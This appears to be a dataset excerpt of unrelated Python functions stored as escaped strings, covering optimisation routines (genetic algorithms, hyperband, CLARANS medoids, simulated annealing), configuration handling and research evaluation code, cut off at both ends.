self.data_set.graphs[rec_type]:\n print(' ', graph)\n sp_file = graph.rsplit('.', 1)[0] + '.npy'\n with open(sp_file, 'rb') as infile:\n sp = pickle.load(infile)\n for miss in self.data_set.missions[rec_type][graph]['optimal']:\n for m in self.data_set.missions[rec_type][graph]['optimal'][miss]:\n for ti in xrange(len(m.targets_original)):\n start = m.path[-2] if m.path else m.start\n debug('++++' * 16, 'mission', ti, '/', len(m.targets_original))\n debug(m.targets_original[ti])\n self.optimal_path(m, start, sp)\n if not (ti + 1) == len(m.targets_original):\n m.path.append(u'*')\n m.reset()\n\n # # DEBUG\n # item2matrix = os.path.join(self.data_set.base_folder, 'item2matrix.txt')\n # for rec_type in ['rbar']:\n # for graph in self.data_set.graphs[rec_type]:\n # print(' ', graph)\n # gt_graph = load_graph(graph)\n # sp_file = graph.rsplit('.', 1)[0] + '.npy'\n # with open(sp_file, 'rb') as infile:\n # sp = pickle.load(infile)\n # m_newc = self.data_set.matrices[rec_type][graph]['title'][1]\n # matrix = SimilarityMatrix(item2matrix, m_newc)\n # sc = 'Berrypicking'\n # mc1 = self.data_set.missions[rec_type][graph]['title'][sc]\n # mc2 = self.data_set.missions[rec_type][graph]['optimal'][sc]\n # mc3 = self.data_set.missions[rec_type][graph]['random'][sc]\n # for m1, m2, m3 in zip(\n # mc1,\n # mc2,\n # mc3\n # ):\n # # evalute with title strategy\n # for ti in xrange(len(m1.targets_original)):\n # start = m1.path[-2] if m1.path else m1.start\n # debug('++++' * 16, 'mission', ti, '/', len(m1.targets_original))\n # # debug(m1.targets_original[ti])\n # self.navigate(gt_graph, 'title', m1, start, None, matrix)\n # # print(m1.path, ti, len(m1.targets_original[ti]), len(m1.targets[0]))\n # if ti > 0 and len(m1.targets_original[ti]) == len(m1.targets[0]):\n # # print('breaking...')\n # m1.reset()\n # break\n # if not (ti + 1) == len(m1.targets_original):\n # m1.path.append(u'*')\n # m1.reset()\n #\n # # evaluate with optimal strategy\n # for ti in xrange(len(m2.targets_original)):\n # start = m2.path[-2] if m2.path else m2.start\n # # debug('++++' * 16, 'mission', ti, '/', len(m2.targets_original))\n # # debug(m2.targets_original[ti])\n # self.optimal_path(m2, start, sp)\n # if not (ti + 1) == len(m2.targets_original):\n # m2.path.append(u'*')\n # m2.reset()\n # # pdb.set_trace()\n #\n # # if len(m1.path) < len(m2.path):\n # # print(len(m1.path), len(m2.path))\n # # pdb.set_trace()\n # # m1.compute_stats()\n # # m2.compute_stats()\n # # if m1.stats[-1] > m2.stats[-1]:\n # # print(m1.stats)\n # # print(m2.stats)\n # # pdb.set_trace()\n #\n # print('MISSION COLLECTION DONE')\n # mc1.compute_stats()\n # mc2.compute_stats()\n # print(mc1.stats[-1], mc2.stats[-1])\n # pdb.set_trace()\n\n # fname_5 = u'../data/bookcrossing/graphs/rbar_5.gt'\n # fname_20 = u'../data/bookcrossing/graphs/rbar_20.gt'\n # sp_file_5 = fname_5.rsplit('.', 1)[0] + '.npy'\n # sp_file_20 = fname_20.rsplit('.', 1)[0] + '.npy'\n # with open(sp_file_5, 'rb') as infile:\n # sp_5 = pickle.load(infile)\n # with open(sp_file_20, 'rb') as infile:\n # sp_20 = pickle.load(infile)\n # sc = 'Berrypicking'\n # mc_5 = self.data_set.missions['rbar'][fname_5]['optimal'][sc]\n # mc_52 = self.data_set.missions['rbar'][fname_5]['title'][sc]\n # mc_20 = self.data_set.missions['rbar'][fname_20]['optimal'][sc]\n # mc_202 = self.data_set.missions['rbar'][fname_20]['title'][sc]\n # for m5, m20, m52, m202 in zip(\n # mc_5,\n # mc_20,\n # mc_52,\n # mc_202\n # ):\n # # evaluate 5 with optimal strategy\n # for ti in xrange(len(m5.targets_original)):\n # start = m5.path[-2] if m5.path else m5.start\n # self.optimal_path(m5, start, sp_5)\n # if not (ti + 1) == len(m5.targets_original):\n # m5.path.append(u'*')\n # m5.reset()\n #\n # # evaluate 20 with optimal strategy\n # for ti in xrange(len(m20.targets_original)):\n # start = m20.path[-2] if m20.path else m20.start\n # self.optimal_path(m20, start, sp_20)\n # if not (ti + 1) == len(m20.targets_original):\n # m20.path.append(u'*')\n # m20.reset()\n #\n # # if len(m5.path) < len(m20.path) or \\\n # if m5.path.count('*') > m20.path.count('*'):\n # print(len(m5.path))\n # for part in ' '.join(m5.path[2:]).split('*'):\n # print(' ', part)\n # print(len(m20.path))\n # for part in ' '.join(m20.path[2:]).split('*'):\n # print(' ', part)\n # pdb.set_trace()\n #\n # print('MISSION COLLECTION DONE')\n # mc_5.compute_stats()\n # mc_20.compute_stats()\n # print(mc_5.stats[-1], mc_20.stats[-1])\n #\n # for m5, m20 in zip(mc_5.missions, mc_20.missions):\n # if m5.stats[-1] > m20.stats[-1]:\n # print(m5.stats)\n # print(m20.stats)\n # pdb.set_trace()\n # pdb.set_trace()\n\n # write the results to a file\n # self.write_paths()\n self.save()", "def _getNextParams(store):\n if isinstance(variables, list):\n if not hasattr(store, 'i'):\n store.i = 0\n if store.i == len(variables):\n return\n store.i += 1\n v = variables[store.i - 1]\n if not isinstance(v, dict):\n raise ValueError(\"Parameter was not dict? {}\".format(v))\n elif isinstance(variables, dict):\n if not hasattr(store, 'stack'):\n store.keys = list(variables.keys())\n store.stack = { name: 0 for name in store.keys }\n store.carry = 0\n\n if store.carry != 0:\n # All set, no more combinations to try\n return\n\n # Load up next set\n v = {}\n for name, vals in variables.items():\n v[name] = vals[store.stack[name]]\n\n # Increment and cascade\n store.carry = 1\n for k in store.keys:\n if store.carry == 0:\n break\n store.stack[k] += 1\n if store.stack[k] >= len(variables[k]):\n store.stack[k] = 0\n store.carry = 1\n else:\n store.carry = 0\n else:\n raise NotImplementedError(variables)\n\n if showProgress:\n sys.stderr.write(\"job_stream.baked: Starting {} of {} with {} \"\n \"trials\\n\".format(store.id, nExperiments-1,\n store.actualMin))\n\n # v is dict with parameters at the moment; give it an ID\n v = v.copy()\n v['id'] = store.id\n store.id += 1\n return (v, store.actualMin)", "def run(self):\n values_to_set = self._load().get_initial_values()\n\n best_data = []\n worst_data = []\n found = False\n overall_nb_generations_done = 0\n restart_counter = 0\n\n while overall_nb_generations_done < self._max_nb_generations and not found:\n new_population = ga_utils.create_generation(self._population_size, values_to_set)\n\n nb_generations_done = 0\n remember_the_best = 0\n nb_generations_without_improvement = 0\n\n # Loop until max allowed generations is reached or a solution is found\n while nb_generations_done < self._max_nb_generations and not found:\n # Rank the solutions\n ranked_population = ga_utils.rank_population(new_population)\n best_solution = ranked_population[0]\n best_score = best_solution.fitness()\n worst_score = ranked_population[-1].fitness()\n best_data.append(best_score)\n worst_data.append(worst_score)\n\n # Manage best value and improvements among new generations over time\n if remember_the_best == best_score:\n nb_generations_without_improvement += 1\n else:\n remember_the_best = best_score\n if 0 < self._restart_after_n_generations_without_improvement < nb_generations_without_improvement:\n print(\"No improvement since {} generations, restarting the program\".\n format(self._restart_after_n_generations_without_improvement))\n restart_counter += 1\n break\n\n # Check if problem is solved and print best and worst results\n if best_score > 0:\n print(\"Problem not solved on generation {} (restarted {} times). Best solution score is {} and \"\n \"worst is {}\".format(nb_generations_done, restart_counter, best_score, worst_score))\n # Not solved => select a new generation among this ranked population\n # Retain only the percentage specified by selection rate\n next_breeders = ga_utils.pick_from_population(ranked_population, self._selection_rate,\n self._random_selection_rate)\n\n children = ga_utils.create_children_random_parents(next_breeders, self._nb_children)\n new_population = ga_utils.mutate_population(children, self._mutation_rate)\n\n nb_generations_done += 1\n overall_nb_generations_done += 1\n else:\n print(\"Problem solved after {} generations ({} overall generations)!!! Solution found is:\".\n format(nb_generations_done, overall_nb_generations_done))\n best_solution.display()\n found = True\n print(\"It took {} to solve it\".format(tools.get_human_readable_time(self._start_time, time())))\n\n if not found:\n print(\"Problem not solved after {} generations. Printing best and worst results below\".\n format(overall_nb_generations_done))\n ranked_population = ga_utils.rank_population(new_population)\n best_solution = ranked_population[0]\n worst_solution = ranked_population[-1]\n print(\"Best is:\")\n best_solution.display()\n print(\"Worst is:\")\n worst_solution.display()\n\n graphics.draw_best_worst_fitness_scores(best_data, worst_data)", "def _advance_to_next_stage(self, config_ids, losses):\n rank = nondominated_sort(losses)\n indices = np.array(range(len(losses)))\n keep_indices = np.array([], dtype=int)\n\n # nondominance rank-based selection\n i = 0\n while len(keep_indices) + sum(rank == i) <= self.num_configs[self.stage]:\n keep_indices = np.append(keep_indices, indices[rank == i])\n i += 1\n keep_indices = np.append(keep_indices, indices[rank == i])\n\n # hypervolume contribution-based selection\n #ys_r = losses[rank == i]\n #indices_r = indices[rank == i]\n #worst_point = np.max(losses, axis=0)\n #reference_point = np.maximum(\n # np.maximum(\n # 1.1 * worst_point, # case: value > 0\n # 0.9 * worst_point # case: value < 0\n # ),\n # np.full(len(worst_point), eps) # case: value = 0\n #)\n\n #S = []\n #contributions = []\n #for j in range(len(ys_r)):\n # contributions.append(hypervolume([ys_r[j]]).compute(reference_point))\n #while len(keep_indices) + 1 <= self.num_configs[self.stage]:\n # hv_S = 0\n # if len(S) > 0:\n # hv_S = hypervolume(S).compute(reference_point)\n # index = np.argmax(contributions)\n # contributions[index] = -1e9 # mark as already selected\n # for j in range(len(contributions)):\n # if j == index:\n # continue\n # p_q = np.max([ys_r[index], ys_r[j]], axis=0)\n # contributions[j] = contributions[j] - (hypervolume(S + [p_q]).compute(reference_point) - hv_S)\n # S = S + [ys_r[index]]\n # keep_indices = np.append(keep_indices, indices_r[index])\n\n return_stat = np.zeros((len(losses))).astype(bool)\n return_stat[keep_indices] = True\n return return_stat\n\n # ranks = np.argsort(np.argsort(losses))\n # return (ranks < self.num_configs[self.stage])", "def race_configs(self, set_of_conf, incumbent, time_left):\n try:\n # Run all in parallel for list of instances\n if \"+LIST\" in self.parallel_options:\n pass\n # Run all in parallel for each instance\n elif \"+EACH\" in self.parallel_options:\n pass\n # Independent race against incumbent\n elif \"+INDP\" in self.parallel_options:\n pass\n else:\n ValueError(\"Wrong Combination Type\")\n\n # dummy solution\n best, inc_perf = self.intensifier.intensify(\n challengers=set_of_conf,\n incumbent=incumbent,\n run_history=self.runhistory,\n aggregate_func=self.aggregate_func,\n time_bound=max(self.intensifier._min_time, time_left)\n )\n return best, inc_perf\n except:\n return", "def get_n_best(self):\n pass", "def get_best_result(self) -> Optional[Tuple[int, Module, Dict[str, Dict[str, Tensor]], float, List[Dict]]]:\n if self._best_task_id is not None:\n compact_model = torch.load(Path(self._log_dir_root, 'best_result', 'model.pth'))\n compact_model_masks = torch.load(Path(self._log_dir_root, 'best_result', 'masks.pth'))\n with Path(self._log_dir_root, 'best_result', 'config_list.json').open('r') as f:\n config_list = json_tricks.load(f)\n return self._best_task_id, compact_model, compact_model_masks, self._best_score, config_list\n return None", "def minimize(self):\n self.normalize()\n p0s = self.spacedvals(method='random')\n if self.n_spots > 1:\n opts = self.multifit(p0s)\n else:\n opts = self.singlefit(p0s)\n self.yf = [self.solve(theta) for theta in opts]\n self.bestps = opts\n return opts", "def _auto_update_configuration(self) -> None:\n self.config = rasa.utils.train_utils.update_confidence_type(self.config)\n rasa.utils.train_utils.validate_configuration_settings(self.config)\n self.config = rasa.utils.train_utils.update_similarity_type(self.config)\n self.config = rasa.utils.train_utils.update_evaluation_parameters(self.config)", "def __optimize_configuration(self):\n index_neighbor = 0\n counter = 0\n while index_neighbor < self.__maxneighbor:\n # get random current medoid that is to be replaced\n current_medoid_index = self.__current[\n random.randint(0, self.__number_clusters - 1)\n ]\n current_medoid_cluster_index = self.__belong[current_medoid_index]\n\n # get new candidate to be medoid\n candidate_medoid_index = random.randint(\n 0, len(self.__pointer_data) - 1\n )\n\n while candidate_medoid_index in self.__current:\n candidate_medoid_index = random.randint(\n 0, len(self.__pointer_data) - 1\n )\n\n candidate_cost = 0.0\n for point_index in range(0, len(self.__pointer_data)):\n if point_index not in self.__current:\n # get non-medoid point and its medoid\n point_cluster_index = self.__belong[point_index]\n point_medoid_index = self.__current[point_cluster_index]\n\n # get other medoid that is nearest to the point (except current and candidate)\n other_medoid_index = self.__find_another_nearest_medoid(\n point_index, current_medoid_index\n )\n other_medoid_cluster_index = self.__belong[\n other_medoid_index\n ]\n\n # for optimization calculate all required distances\n # from the point to current medoid\n distance_current = euclidean_distance_square(\n self.__pointer_data[point_index],\n self.__pointer_data[current_medoid_index],\n )\n\n # from the point to candidate median\n distance_candidate = euclidean_distance_square(\n self.__pointer_data[point_index],\n self.__pointer_data[candidate_medoid_index],\n )\n\n # from the point to nearest (own) medoid\n distance_nearest = float(\"inf\")\n if (point_medoid_index != candidate_medoid_index) and (\n point_medoid_index != current_medoid_cluster_index\n ):\n distance_nearest = euclidean_distance_square(\n self.__pointer_data[point_index],\n self.__pointer_data[point_medoid_index],\n )\n\n # apply rules for cost calculation\n if point_cluster_index == current_medoid_cluster_index:\n # case 1:\n if distance_candidate >= distance_nearest:\n candidate_cost += (\n distance_nearest - distance_current\n )\n\n # case 2:\n else:\n candidate_cost += (\n distance_candidate - distance_current\n )\n\n elif point_cluster_index == other_medoid_cluster_index:\n # case 3 ('nearest medoid' is the representative object of that cluster and object is more\n # similar to 'nearest' than to 'candidate'):\n if distance_candidate > distance_nearest:\n pass\n\n # case 4:\n else:\n candidate_cost += (\n distance_candidate - distance_nearest\n )\n\n if candidate_cost < 0:\n counter += 1\n # set candidate that has won\n self.__current[\n current_medoid_cluster_index\n ] = candidate_medoid_index\n\n # recalculate clusters\n self.__update_clusters(self.__current)\n\n # reset iterations and starts investigation from the begining\n index_neighbor = 0\n\n else:\n\n index_neighbor += 1\n\n print(\"Medoid set changed {0} times\".format(counter))", "def get_station_configuration(station_id, station_configuration):\n \n si = station_id.decode('utf-8')\n \n if ':' in si:\n si = si.split(':')[1] , 'utf-8' \n station_id_secondary = '0-20000-0-' +si # remove the prefix to the station id \n else:\n for iid in b'0',b'1':\n \n station_id_primary = b'0-2000'+iid+b'-0-' +si # remove the prefix to the station id \n matching_primary_ind = np.where(station_configuration['primary_id'] == station_id_primary)[0]\n stat_conf_retrieved = station_configuration.loc[matching_primary_ind]\n if len(stat_conf_retrieved) > 0:\n return stat_conf_retrieved\n else:\n station_id_secondary=station_id_primary\n\n secondary = station_configuration['secondary_id'] \n loc=0\n for s in secondary:\n s = np.bytes_(str(s))\n try: \n if b'[' in s:\n st = s.replace(b'[',b'').replace(b']',b'')\n stl=st.split(b',')\n for st in stl:\n if si==st:\n #return loc # OLD wrong \n return station_configuration.loc[loc] # new version, might not work ???\n else:\n if si==s: \n return station_configuration.loc[loc] # new version, might not work ???\n except MemoryError:\n return 0\n loc=loc+1\n return 0", "def get_config_sample_speed():\n # try changing learning rate\n config = get_default_config()\n\n config['train_batch_size'] = 16384\n config['_policies'] = [None, \"from_scratch_sb\", \"pretrained\"]\n config['lr'] = 3e-4\n config['sgd_minibatch_size'] = 4096\n config['num_sgd_iter'] = 4\n config['rollout_fragment_length'] = 100\n config['num_workers'] = tune.grid_search([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])\n\n config['num_envs_per_worker'] = tune.grid_search([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])\n\n # ['humanoid_blocker', 'humanoid'],\n config['_train_policies'] = ['player_1']\n config['num_gpus'] = 0\n config['_train_steps'] = 20\n config[\"batch_mode\"] = \"complete_episodes\"\n\n config['_trainer'] = \"PPO\"\n config['_policy'] = \"PPO\"\n config['_call']['num_samples'] = 1\n config['_call']['resources_per_trial'] = {\n \"custom_resources\": {\"tune_cpu\": tune.sample_from(lambda spec: spec.config.num_workers + 10)}} # upper bound\n\n # config['_run_inline'] = True\n\n return config", "def generate_advantageous_configs(n_not_dealt, threshold):\n total = 0\n for _ in combinations_with_replacement(range(1, 11), n_not_dealt):\n total += 1\n total *= 100\n count = 0\n progress = min(10000, total / 10)\n print \"total configs \" + str(total)\n for not_dealt in combinations_with_replacement(range(1, 11), n_not_dealt):\n ua = 1\n for ub in range(1, 11):\n for ud in range(1, 11):\n shoe = {}\n for card in not_dealt:\n shoe[card] = shoe.get(card, 0) + 1\n shoe[ua] = shoe.get(ua, 0) + 1\n shoe[ub] = shoe.get(ub, 0) + 1\n shoe[ud] = shoe.get(ud, 0) + 1\n C = get_C_matrix(ua, ub, ud, shoe)\n if possible_advantage(C):\n nonzero_rows = C[np.any(C, axis=1)]\n nonzero = nonzero_rows[:,~np.all(nonzero_rows == 0, axis=0)]\n\n biased_S, biased_alpha, biased_D, biased_X, biased_Y = get_biased_hyperbit_sdp_discrete(\n nonzero)\n biased_obj = get_payout(nonzero, biased_S)\n\n classical_S, classical_p, classical_alpha, classical_beta = get_classical_discrete(\n nonzero)\n\n classical_obj = get_payout(nonzero, classical_S)\n\n if biased_obj - classical_obj > threshold:\n yield ua, ub, ud, not_dealt, biased_obj, classical_obj, biased_obj - classical_obj\n count += 1\n if count % progress == 0:\n print \"finished \" + str(count) + \" out of \" + str(total) + \" configurations \"", "def __optimize_configuration(self):\r\n index_neighbor = 0\r\n counter = 0\r\n while (index_neighbor < self.__maxneighbor):\r\n # get random current medoid that is to be replaced\r\n current_medoid_index = self.__current[random.randint(0, self.__number_clusters - 1)]\r\n current_medoid_cluster_index = self.__belong[current_medoid_index]\r\n\r\n # get new candidate to be medoid\r\n candidate_medoid_index = random.randint(0, len(self.__pointer_data) - 1)\r\n\r\n while candidate_medoid_index in self.__current:\r\n candidate_medoid_index = random.randint(0, len(self.__pointer_data) - 1)\r\n\r\n candidate_cost = 0.0\r\n for point_index in range(0, len(self.__pointer_data)):\r\n if point_index not in self.__current:\r\n # get non-medoid point and its medoid\r\n point_cluster_index = self.__belong[point_index]\r\n point_medoid_index = self.__current[point_cluster_index]\r\n\r\n # get other medoid that is nearest to the point (except current and candidate)\r\n other_medoid_index = self.__find_another_nearest_medoid(point_index, current_medoid_index)\r\n other_medoid_cluster_index = self.__belong[other_medoid_index]\r\n\r\n # for optimization calculate all required distances\r\n # from the point to current medoid\r\n distance_current = euclidean_distance_square(self.__pointer_data[point_index], self.__pointer_data[current_medoid_index])\r\n\r\n # from the point to candidate median\r\n distance_candidate = euclidean_distance_square(self.__pointer_data[point_index], self.__pointer_data[candidate_medoid_index])\r\n\r\n # from the point to nearest (own) medoid\r\n distance_nearest = float('inf')\r\n if ( (point_medoid_index != candidate_medoid_index) and (point_medoid_index != current_medoid_cluster_index) ):\r\n distance_nearest = euclidean_distance_square(self.__pointer_data[point_index], self.__pointer_data[point_medoid_index])\r\n\r\n # apply rules for cost calculation\r\n if (point_cluster_index == current_medoid_cluster_index):\r\n # case 1:\r\n if (distance_candidate >= distance_nearest):\r\n candidate_cost += distance_nearest - distance_current\r\n\r\n # case 2:\r\n else:\r\n candidate_cost += distance_candidate - distance_current\r\n\r\n elif (point_cluster_index == other_medoid_cluster_index):\r\n # case 3 ('nearest medoid' is the representative object of that cluster and object is more similar to 'nearest' than to 'candidate'):\r\n if (distance_candidate > distance_nearest):\r\n pass;\r\n\r\n # case 4:\r\n else:\r\n candidate_cost += distance_candidate - distance_nearest\r\n\r\n if (candidate_cost < 0):\r\n counter+=1\r\n # set candidate that has won\r\n self.__current[current_medoid_cluster_index] = candidate_medoid_index\r\n\r\n # recalculate clusters\r\n self.__update_clusters(self.__current)\r\n\r\n # reset iterations and starts investigation from the begining\r\n index_neighbor = 0\r\n\r\n else:\r\n\r\n index_neighbor += 1\r\n\r\n print(\"Medoid set changed {0} times\".format(counter))", "def get_configspace() -> CS.Configuration:\n cs = CS.ConfigurationSpace(seed=0)\n # START TODO ################\n lr_hp = CS.UniformFloatHyperparameter('lr', lower=1e-6, upper=1e-1, default_value=1e-2, log=True)\n optimizer_hp = CSH.CategoricalHyperparameter(name='optimizer', choices=['Adam', 'SGD', 'RMSprop'])\n sgd_momentum_hp = CS.UniformFloatHyperparameter('sgd_momentum', lower=0.00, upper=0.99, default_value=0.9)\n\n rms_momentum_hp = CS.UniformFloatHyperparameter('rms_momentum', lower=0.00, upper=0.99, default_value=0.9)\n rms_alpha_hp = CS.UniformFloatHyperparameter('rms_alpha', lower=0.00, upper=0.99, default_value=0.99)\n\n scheduler_hp = CSH.CategoricalHyperparameter(name='scheduler',\n choices=['CosineAnnealingLR', 'CosineAnnealingWarmRestarts'])\n cosine_max_t_hp = CS.UniformIntegerHyperparameter(name='cosine_max_t', lower=50, upper=300, default_value=150)\n cosine_warm_hp = CS.UniformIntegerHyperparameter(name='warm_t_0', lower=50, upper=300, default_value=150)\n\n sgd_cond = CS.EqualsCondition(sgd_momentum_hp, optimizer_hp, 'SGD')\n rms_cond1 = CS.EqualsCondition(rms_momentum_hp, optimizer_hp, 'RMSprop')\n rms_cond2 = CS.EqualsCondition(rms_alpha_hp, optimizer_hp, 'RMSprop')\n cosine_warm_cond = CS.EqualsCondition(cosine_warm_hp, scheduler_hp, 'CosineAnnealingWarmRestarts')\n cosine_cond = CS.EqualsCondition(cosine_max_t_hp, scheduler_hp, 'CosineAnnealingLR')\n cs.add_hyperparameters([lr_hp, optimizer_hp, sgd_momentum_hp, rms_momentum_hp,\n rms_alpha_hp, scheduler_hp, cosine_max_t_hp, cosine_warm_hp])\n cs.add_conditions([sgd_cond, rms_cond1, rms_cond2, cosine_cond, cosine_warm_cond])\n # END TODO ################\n return cs", "def _optimise(self):\n better = True\n self.solutions = set()\n\n # Rebuild the neighbours\n self.neighbours = {}\n\n for i in self.heuristic_path:\n self.neighbours[i] = []\n\n for j, dist in enumerate(TSP.edges[i]):\n if dist > 0 and j in self.heuristic_path:\n self.neighbours[i].append(j)\n\n # Restart the loop each time we find an improving candidate\n while better:\n better = self.improve()\n # Paths always begin at 0 so this should manage to find duplicate\n # solutions\n self.solutions.add(str(self.heuristic_path))\n\n self.save(self.heuristic_path, self.heuristic_cost)", "def test_lq_fit(self):\n # note: all prints here go to the output item in the json file\n\n # the best config and best score should have the right values\n best_config = self.notebook_locals[\"best_config\"]\n best_score = self.notebook_locals[\"best_score\"]\n self.assertFalse(best_config != 6, \"The chosen basis set is incorrect\")\n self.assertFalse(best_score != 63831, \"The best score is incorrect\")", "def run(self, no_improv_gen):\r\n bestvalue = min(self.cost_populations)\r\n no_improvement_tries = 0\r\n starttime = timeit.default_timer()\r\n\r\n while no_improvement_tries < no_improv_gen:\r\n endtime = timeit.default_timer()\r\n print(f\"Best value: {bestvalue}, no improvement tries: {no_improvement_tries}, time:{endtime - starttime}\")\r\n\r\n self.improve_population()\r\n self.sort_values()\r\n self.make_parents()\r\n self.parents_loop()\r\n \r\n # add best of the old population to the population\r\n while len(self.district_population) < self.population_size:\r\n index = self.best_costs.index(min(self.best_costs))\r\n self.cost_populations.append(self.best_costs[index])\r\n self.district_population.append(self.best_districts[index])\r\n del self.best_costs[index]\r\n del self.best_districts[index]\r\n\r\n if min(self.cost_populations) < bestvalue:\r\n bestvalue = min(self.cost_populations)\r\n no_improvement_tries = 0\r\n else:\r\n no_improvement_tries += 1\r\n \r\n self.best_districts = []\r\n self.best_costs = []\r\n self.worst_districts = []\r\n \r\n bestdistrict = self.cost_populations.index(bestvalue)\r\n return self.district_population[bestdistrict]", "def best_bat(self):\n\n i = 0\n j = 0\n for i in range(self.NP):\n if self.Fitness[i] < self.Fitness[j]:\n j = i\n for i in range(self.D):\n self.best[i] = self.Sol[j][i]\n self.f_min = self.Fitness[j]", "def find_best(template, config, key_seq, metric):\n possibles = get_deep(template, key_seq)\n if 1 == len(possibles):\n return None\n best_score = 2**60\n best_val = None\n for val in possibles:\n set_deep(config, key_seq, val)\n score = metric(config)\n #print \"FFFFFFFFF\", score\n if score < best_score:\n best_score = score\n best_val = val\n set_deep(config, key_seq, best_val)\n return best_score", "def initPopulation(self):\n for i in range(0, self.popSize):\n individual = Individual(self.genSize, self.data)\n individual.computeFitness()\n self.population.append(individual)\n\n self.best = self.population[0].copy()\n for ind_i in self.population:\n if self.best.getFitness() > ind_i.getFitness():\n self.best = ind_i.copy()\n print (\"Best initial sol: \",self.best.getFitness())", "def solve(self):\n while self.counter[-1] != len(self.sequences[-1]) + 1:\n basepair = self.generatebasepairs(self.counter) # Get the combination for the current coordination\n moves = self.generatemoves(basepair) # Get all possible ways to get to this current coordination\n\n maxscore = -100000000 # set the maxscore to a value which is always lower than possible scores\n bestmove = None\n\n # FOr each move calculate score\n for move in moves:\n coordinates = self.generatecoordinates(move, self.counter) # generate the origin coordinate for the current move\n score = self.retrievematrixelement(coordinates).score # Get the score at the origin coordinate\n pairs = self.getallpairs(move) # Get all pairs possible for the current move\n scores = [self.scorePair(u) for u in pairs] # Generate scores for all pairs\n newscore = score + sum(scores) # Add generated scores to origin score\n if newscore > maxscore:\n maxscore = newscore\n bestmove = coordinates\n\n self.enterelement(self.counter, Score(bestmove, maxscore))\n self.increase()", "def _choose_best_option(self):", "def _fit_multiple(self, X, y, configurations, bracket_num):\n device_used = self.device\n if device_used == 'cuda':\n device_used += f':{self.gpu_ids[bracket_num % self.n_device]}'\n list_toTrain_model = []\n best_config_by_round = []\n\n for i in tqdm(range(bracket_num + 1), desc=f'Bracket {bracket_num}', position=(self.max_rounds-bracket_num), leave=True):\n for contender in range(self.brackets[bracket_num][i]['ni']):\n self.brackets[bracket_num][i]['contenders'][contender] = dict.fromkeys([\n 'hparams', 'score'])\n self.brackets[bracket_num][i]['contenders'][contender]['hparams'] = configurations[contender]['hparams']\n model = self.create_model(\n self.estimator,\n random_state=self.random_state,\n epoch=self.brackets[bracket_num][i]['ri'],\n device=device_used,\n log_path=self.log_path,\n **configurations[contender]['hparams']\n )\n verbose = 0\n list_toTrain_model.append(\n (model, X, y, self.scoring, self.cv, self.n_jobs_cv, verbose))\n\n torch.multiprocessing.set_start_method('spawn', force=True)\n with MyPool(self.n_jobs_model) as p:\n list_toTrain_score = p.starmap(\n self.get_mean_cv_score, list_toTrain_model)\n\n for contender in range(self.brackets[bracket_num][i]['ni']):\n self.brackets[bracket_num][i]['contenders'][contender]['score'] = list_toTrain_score[contender]\n\n configurations = self.get_top_k(\n self.brackets[bracket_num][i]['contenders'],\n k=max(math.floor(\n self.brackets[bracket_num][i]['ni']/self.factor), 1)\n )\n\n best_config = configurations[0].copy()\n best_config_by_round.append({\n 'bracket': bracket_num,\n 'round': i,\n 'epoch': int(self.brackets[bracket_num][i]['ri']),\n **best_config\n })\n\n return best_config_by_round", "def SA(targetMDG):\n hill_climbers = []\n for i in range(NUM_Population):\n hill_climbers.append(SimulatedAnnealing(targetMDG))\n\n completed_climbers = []\n completed_max_climbers = []\n\n # k: int, number of neighbors to be considered\n k = 20\n i = 0\n not_increased = 0\n max_score = 0\n\n while True:\n for climber in hill_climbers[:]:\n result = climber.climb_with_annealing(k, i)\n if not result:\n completed_climbers.append(climber)\n hill_climbers.remove(climber)\n max_completed_climber = SimulatedAnnealing(targetMDG)\n max_completed_climber.result = climber.max_result\n max_completed_climber.update_score()\n completed_max_climbers.append(max_completed_climber)\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n print(\"Iteration \", i, \": \", total_climbers[-1].score)\n\n if total_climbers[-1].score - max_score != 0:\n not_increased = 0\n else:\n not_increased += 1\n\n if len(hill_climbers) == 0 or not_increased == 10:\n break\n i += 1\n max_score = total_climbers[-1].score\n\n total_climbers = hill_climbers + completed_climbers + completed_max_climbers\n total_climbers.sort()\n\n max_climber = total_climbers[-1]\n\n print(\"TurboMQ = \", max_climber.score)\n for c in max_climber.result: # print all clusters which are not singleton\n if 1 != len(c.get_nodes()):\n print(c.get_nodes())\n\n return max_climber.result", "def get_station_configuration_l(station_id, station_configuration):\n \n si = np.string_(station_id) \n \n if b':' in si:\n #si = bytes( (si.split(':')[1] , 'utf-8') )\n station_id_secondary = b'0-20000-0-' +si # remove the prefix to the station id \n else:\n for iid in b'0',b'1':\n \n station_id_primary = b'0-2000'+iid+b'-0-' +si # remove the prefix to the station id \n matching_primary_ind = np.where(station_configuration['primary_id'] == station_id_primary)[0]\n stat_conf_retrieved = station_configuration.loc[matching_primary_ind]\n if len(stat_conf_retrieved) > 0:\n return stat_conf_retrieved\n else:\n station_id_secondary=station_id_primary\n\n secondary = station_configuration['secondary_id'] \n loc=0\n for s in secondary:\n s = np.bytes_(str(s))\n try: \n if b'[' in s:\n st = s.replace(b'[',b'').replace(b']',b'')\n stl=st.split(b',')\n for st in stl:\n if si==st:\n #return loc # OLD wrong \n return station_configuration.loc[loc] # new version, might not work ???\n else:\n if si==s: \n return station_configuration.loc[loc] # new version, might not work ???\n except MemoryError:\n return 0\n loc=loc+1\n return 0", "async def spa_configured(self):\n await self.send_config_req()\n await self.send_panel_req(0, 1)\n # get the versions and model data\n await self.send_panel_req(2, 0)\n while True:\n if (self.connected\n and self.config_loaded\n and self.macaddr != 'Unknown'\n and self.curtemp != 0.0):\n return\n await asyncio.sleep(1)", "def get_bestPoses(self):\r\n \r\n if not \"dscores\" in self.__dict__:\r\n self.get_bestdockingscore()\r\n \r\n # define directory\r\n pr_bestPoses = pathFolder.createFolder(self.pr_out + \"BEST_POSES/\")\r\n self.pr_bestPoses = pr_bestPoses\r\n lbest_poses = []\r\n\r\n for chemID in self.dscores.keys():\r\n bestScoreDock = float(self.dscores[chemID][\"r_i_docking_score\"])\r\n bestScoreEmodel = float(self.dscores[chemID][\"r_i_glide_emodel\"])\r\n\r\n ipose = 0\r\n nbpose = len(self.cPoses.lc)\r\n while ipose < nbpose:\r\n namepose = self.cPoses.lc[ipose][\"s_m_entry_name\"]\r\n nameChem = namepose.split(\".\")[0]\r\n try:\r\n dock_score = float(self.cPoses.lc[ipose][\"r_i_docking_score\"])\r\n emodel_score = float(self.cPoses.lc[ipose][\"r_i_glide_emodel\"])\r\n except:\r\n ipose = ipose + 